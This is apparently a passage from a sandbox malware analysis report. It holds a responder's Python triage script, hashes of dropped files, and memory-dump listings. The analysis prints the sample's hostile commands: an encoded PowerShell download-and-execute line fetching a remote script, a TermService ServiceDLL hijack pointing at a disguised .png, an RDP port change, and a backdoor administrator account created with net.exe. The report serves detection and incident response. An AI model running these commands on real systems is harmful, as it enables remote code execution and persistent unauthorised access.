        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        Note: the -enc argument is base64 over UTF-16LE text and decodes to
        IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")
        which is the URL shown under Malware Config. The HKEY_USERS and ServiceProfiles\NetworkService artifacts attributed to this process show it ran as NETWORK SERVICE, consistent with being launched from the hijacked TermService rather than from the Admin session that ran the sample.
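The command lines above carry most of what a responder needs from this run, so here is a worked example of pulling the actionable facts out of them mechanically. This is an added example, not code from the sandbox or from the sample: it decodes the -enc blob (PowerShell's -EncodedCommand is base64 over UTF-16LE text, which is why the argument is full of A characters), converts the RDP PortNumber data, flags a TermService ServiceDLL that does not end in termsrv.dll, and lists the account and group changes made through net.exe. The sample command lines are copied from the report's process tree; the parsers, the field names in the result and the choice of which registry keys to flag are my own, and the regexes are only meant for the reg.exe / net.exe / powershell.exe shapes that occur on this page.

```python
"""Triage the command lines from the Processes section above (added example, not
sandbox or sample code). SAMPLE_CMDLINES is constructed from the report's own
process tree; the parsers are mine and only understand the reg.exe / net.exe /
powershell.exe shapes that occur there."""
import base64
import re

RDP_TCP_KEY = r"control\terminal server\winstations\rdp-tcp"   # matched by suffix
TERMSERVICE_KEY = r"services\termservice\parameters"
LEGIT_TERMSRV = "termsrv.dll"   # what TermService's ServiceDLL normally ends with

# The -enc invocation exactly as recorded in the report: base64 of UTF-16LE text.
ENCODED_CMDLINE = (
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# Constructed sample input: the other host-changing command lines from the tree.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    "net.exe user WgaUtilAcc 000000 /del",
    "net.exe user WgaUtilAcc uc7YWrTP /add",
    'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    "net.exe user WgaUtilAcc uc7YWrTP",
    ENCODED_CMDLINE,
]

def decode_encoded_command(cmdline):
    """Plaintext of a -e/-ec/-enc/-EncodedCommand argument, or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    blob = m.group(1) + "=" * (-len(m.group(1)) % 4)   # restore stripped padding
    try:   # PowerShell encodes the script as UTF-16LE, hence all the 'A's (zero bytes)
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def parse_reg_add(cmdline):
    """(key, value name, data) from a `reg add` command line, or None."""
    if not re.search(r'\breg(?:\.exe)?"?\s+add\b', cmdline, re.I):
        return None
    key = re.search(r'\badd\s+"?([^"]+?)"?\s+/v\s', cmdline, re.I)
    name = re.search(r"/v\s+(\S+)", cmdline, re.I)
    data = re.search(r'/d\s+"?([^"]+?)"?(?:\s+/|\s*$)', cmdline, re.I)
    if not (key and name and data):
        return None
    return key.group(1), name.group(1), data.group(1)

def parse_net(cmdline):
    """(verb, positional args, switches) from a net.exe/net1 user|localgroup line, or None."""
    m = re.search(r'\bnet1?(?:\.exe)?"?\s+(user|localgroup)\s+(.*)$', cmdline, re.I)
    if not m:
        return None
    tokens = [q or w for q, w in re.findall(r'"([^"]*)"|(\S+)', m.group(2))]
    switches = {t.lower() for t in tokens if t.startswith("/")}
    return m.group(1).lower(), [t for t in tokens if not t.startswith("/")], switches

def triage(cmdlines):
    """Summarise what the recorded command lines do to the host."""
    f = {"decoded_powershell": [], "urls": [], "rdp_port": None,
         "termservice_dll": None, "termservice_hijacked": False,
         "accounts_added": [], "accounts_deleted": [], "password_resets": [],
         "group_adds": []}
    for line in cmdlines:
        plain = decode_encoded_command(line)
        if plain:
            f["decoded_powershell"].append(plain)
            f["urls"] += re.findall(r"https?://[^\s\"')]+", plain)
        reg = parse_reg_add(line)
        if reg:
            key, name, data = reg
            if key.lower().endswith(RDP_TCP_KEY) and name.lower() == "portnumber":
                f["rdp_port"] = int(data, 16) if data.lower().startswith("0x") else int(data)
            elif key.lower().endswith(TERMSERVICE_KEY) and name.lower() == "servicedll":
                f["termservice_dll"] = data
                f["termservice_hijacked"] = not data.lower().endswith(LEGIT_TERMSRV)
        net = parse_net(line)
        if net:
            verb, args, switches = net
            if verb == "localgroup" and "/add" in switches and len(args) >= 2:
                f["group_adds"].append((args[0], args[1]))   # (group, member)
            elif verb == "user" and "/add" in switches:
                f["accounts_added"].append(args[0])
            elif verb == "user" and "/del" in switches:
                f["accounts_deleted"].append(args[0])
            elif verb == "user" and len(args) == 2:          # `net user NAME PASSWORD`
                f["password_resets"].append(args[0])
    return f

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINES).items():
        print(f"{key}: {value}")
```

Run as a script it prints the decoded PowerShell (the same URL the sandbox shows under Malware Config), rdp_port 7201, the mediasrv.png ServiceDLL marked as a hijack, and WgaUtilAcc under accounts_deleted, accounts_added, password_resets and two group_adds. The regexes deliberately accept quoted and unquoted registry paths and the /ADD versus /add spelling, because that is how the script itself varies them; they are not a general Windows command-line parser, and a real pipeline would feed them from Sysmon event 1 or 4688 CommandLine fields rather than from a pasted report.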
Downloads

C:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.dll
  (the assembly csc.exe built for ready.ps1; see the csc.exe/cvtres.exe entries in the process tree)
  MD5:    565a30f7f4af35b549c830654303069e
  SHA1:   0214896ff8866856cbe9cac258842697df1a80de
  SHA256: 223623460f848323cf676c73556863b8a1a30c59cbd9306047b8ce090d332d04
  SHA512: 1bd5f0827e3adcac5f18ad9316a36b92640cb6e82be4337b76ccfc869928f16d00d0b4f35931c7986c001372db0839ebe310228d8e52ac602f44165e91db50ba

C:\Users\Admin\AppData\Local\Temp\3767.exe
  MD5:    63151e4f7c3972f18a23c0e9996e14ef
  SHA1:   5d041fde6433a8ff8fc78a69fca1fd4630e3f270
  SHA256: cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
  SHA512: f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

C:\Users\Admin\AppData\Local\Temp\RES5010.tmp
  MD5:    b8ea36d7637385e0a1d68dc93e0a0aea
  SHA1:   6e1ca83a19b3d4ee98f7a95cb5b754b10b9700d1
  SHA256: 4ca46f1d855e269f75cc15bc421a6e2d3854317b20cdb29b710e1d635e140e94
  SHA512: 337d4a6b54ff331afdba6f8fef78ff77b50dc098e172e8461421741254067bc386421280209e1c14a2c91790dee06f0a7f8d7f01ea986fd211ae429cbd7e020e

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
  MD5:    f783019c5dc4a5477d1ffd4f9f512979
  SHA1:   37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
  SHA256: 4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
  SHA512: 64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a

C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5:    28d9755addec05c0b24cca50dfe3a92b
  SHA1:   7d3156f11c7a7fb60d29809caf93101de2681aa3
  SHA256: abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
  SHA512: 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.0.cs
  MD5:    9f8ab7eb0ab21443a2fe06dab341510e
  SHA1:   2b88b3116a79e48bab7114e18c9b9674e8a52165
  SHA256: e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
  SHA512: 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.cmdline
  MD5:    47a31f85f924e91feab0fbfa94f21fde
  SHA1:   b66c67b4821e6afb22669c2ef571368e2a6896a6
  SHA256: 60f2957f4490a07e6ad7176cc051eb30639b34cea01d7e1830c0a637cc68cb57
  SHA512: 1478827b888651c4c005008f558cb4d716344fb1ab6442f71c0fa5f0ae5617b46ffd0294747200fd4e22519dc7546c2c24314c0dfbad6a799383d995c1c6b9f7

\??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\CSCBD3710FE722445B4ABAE1C68D47DEE80.TMP
  MD5:    c6ca9ee8551fafbe02d4c0ff1ac8101c
  SHA1:   2105df499383daa43239a63fbcac4b6b32aa1f7e
  SHA256: fd915b325b877cdc5481cd37c223bb4f1aab60dcb5eb77119af8dd2a1722f2fa
  SHA512: fda53d9d1b11a6b1ffd43c7291ca1fe329942d0e8ba3c6732cf08e4ea0775f4e5c63d40cf5060507da5f2a18ad561c6258deb7531cf58c906f18a3ac937df3f5

\Windows\Branding\mediasrv.png
  MD5:    ac13d804585a74dc542db4ec94da39df
  SHA1:   8642ae2e04e492700caf41b43de9ef9d8b3c26f9
  SHA256: 84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
  SHA512: 0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf

\Windows\Branding\mediasvc.png
  MD5:    9151c95451abb048a44f98d0afac8264
  SHA1:   22f447b210eb25c11be5a9c31f254f5f2bd50a78
  SHA256: 8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
  SHA512: 728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/596-302-0x000001C7E2178000-0x000001C7E217A000-memory.dmpFilesize
8KB
-
memory/596-301-0x000001C7E2176000-0x000001C7E2178000-memory.dmpFilesize
8KB
-
memory/596-267-0x000001C7E2173000-0x000001C7E2175000-memory.dmpFilesize
8KB
-
memory/596-266-0x000001C7E2170000-0x000001C7E2172000-memory.dmpFilesize
8KB
-
memory/596-252-0x0000000000000000-mapping.dmp
-
memory/600-138-0x00000153F5A00000-0x00000153F5A01000-memory.dmpFilesize
4KB
-
memory/600-158-0x00000153F5DE0000-0x00000153F5DE1000-memory.dmpFilesize
4KB
-
memory/600-134-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-135-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-136-0x00000153F5110000-0x00000153F5112000-memory.dmpFilesize
8KB
-
memory/600-137-0x00000153F5113000-0x00000153F5115000-memory.dmpFilesize
8KB
-
memory/600-205-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-132-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-140-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-144-0x00000153F5116000-0x00000153F5118000-memory.dmpFilesize
8KB
-
memory/600-131-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-130-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-129-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-206-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-128-0x0000000000000000-mapping.dmp
-
memory/600-166-0x00000153F5118000-0x00000153F5119000-memory.dmpFilesize
4KB
-
memory/600-159-0x00000153F6170000-0x00000153F6171000-memory.dmpFilesize
4KB
-
memory/600-152-0x00000153F5140000-0x00000153F5141000-memory.dmpFilesize
4KB
-
memory/600-133-0x00000153F50D0000-0x00000153F50D1000-memory.dmpFilesize
4KB
-
memory/824-370-0x0000000000000000-mapping.dmp
-
memory/836-368-0x0000000000000000-mapping.dmp
-
memory/940-148-0x0000000000000000-mapping.dmp
-
memory/1088-381-0x0000000000000000-mapping.dmp
-
memory/1088-387-0x000001FDF2C00000-0x000001FDF2C02000-memory.dmpFilesize
8KB
-
memory/1088-388-0x000001FDF2C03000-0x000001FDF2C05000-memory.dmpFilesize
8KB
-
memory/1088-396-0x000001FDF2C06000-0x000001FDF2C08000-memory.dmpFilesize
8KB
-
memory/1088-422-0x000001FDF2C08000-0x000001FDF2C09000-memory.dmpFilesize
4KB
-
memory/1336-369-0x0000000000000000-mapping.dmp
-
memory/1508-201-0x00000197D2F86000-0x00000197D2F88000-memory.dmpFilesize
8KB
-
memory/1508-168-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-177-0x00000197D2F83000-0x00000197D2F85000-memory.dmpFilesize
8KB
-
memory/1508-178-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-180-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-181-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-176-0x00000197D2F80000-0x00000197D2F82000-memory.dmpFilesize
8KB
-
memory/1508-202-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-203-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-174-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-173-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-167-0x0000000000000000-mapping.dmp
-
memory/1508-221-0x00000197D2F88000-0x00000197D2F8A000-memory.dmpFilesize
8KB
-
memory/1508-169-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-170-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-171-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1628-376-0x0000000000000000-mapping.dmp
-
memory/1660-367-0x0000000000000000-mapping.dmp
-
memory/1680-264-0x000001D76ECB6000-0x000001D76ECB8000-memory.dmpFilesize
8KB
-
memory/1680-223-0x000001D76ECB3000-0x000001D76ECB5000-memory.dmpFilesize
8KB
-
memory/1680-265-0x000001D76ECB8000-0x000001D76ECBA000-memory.dmpFilesize
8KB
-
memory/1680-222-0x000001D76ECB0000-0x000001D76ECB2000-memory.dmpFilesize
8KB
-
memory/1680-211-0x0000000000000000-mapping.dmp
-
memory/1724-372-0x0000000000000000-mapping.dmp
-
memory/1748-145-0x0000000000000000-mapping.dmp
-
memory/1848-374-0x0000000000000000-mapping.dmp
-
memory/1964-373-0x0000000000000000-mapping.dmp
-
memory/1968-371-0x0000000000000000-mapping.dmp
-
memory/2012-377-0x0000000000000000-mapping.dmp
-
memory/2160-353-0x0000000000000000-mapping.dmp
-
memory/2208-361-0x0000000000000000-mapping.dmp
-
memory/2256-360-0x0000000000000000-mapping.dmp
-
memory/2448-363-0x0000000000000000-mapping.dmp
-
memory/2480-362-0x0000000000000000-mapping.dmp
-
memory/2644-449-0x0000000000000000-mapping.dmp
-
memory/2692-357-0x0000000000000000-mapping.dmp
-
memory/2748-358-0x0000000000000000-mapping.dmp
-
memory/3032-118-0x0000000000450000-0x0000000000466000-memory.dmpFilesize
88KB
-
memory/3116-314-0x0000000000000000-mapping.dmp
-
memory/3188-352-0x0000000000000000-mapping.dmp
-
memory/3244-359-0x0000000000000000-mapping.dmp
-
memory/3248-375-0x0000000000000000-mapping.dmp
-
memory/3316-117-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/3316-115-0x0000000002FE0000-0x0000000002FE8000-memory.dmpFilesize
32KB
-
memory/3316-116-0x0000000002FF0000-0x0000000002FF9000-memory.dmpFilesize
36KB
-
memory/3452-379-0x0000000000000000-mapping.dmp
-
memory/3456-315-0x0000000000000000-mapping.dmp
-
memory/3564-378-0x0000000000000000-mapping.dmp
-
memory/3592-313-0x0000000000000000-mapping.dmp
-
memory/3640-380-0x0000000000000000-mapping.dmp
-
memory/3688-450-0x0000000000000000-mapping.dmp
-
memory/3812-356-0x0000000000000000-mapping.dmp
-
memory/3936-366-0x0000000000000000-mapping.dmp
-
memory/3988-125-0x0000015C2CC13000-0x0000015C2CC15000-memory.dmpFilesize
8KB
-
memory/3988-122-0x0000015C45840000-0x0000015C45C3F000-memory.dmpFilesize
4.0MB
-
memory/3988-119-0x0000000000000000-mapping.dmp
-
memory/3988-126-0x0000015C2CC15000-0x0000015C2CC16000-memory.dmpFilesize
4KB
-
memory/3988-124-0x0000015C2CC10000-0x0000015C2CC12000-memory.dmpFilesize
8KB
-
memory/3988-127-0x0000015C2CC16000-0x0000015C2CC17000-memory.dmpFilesize
4KB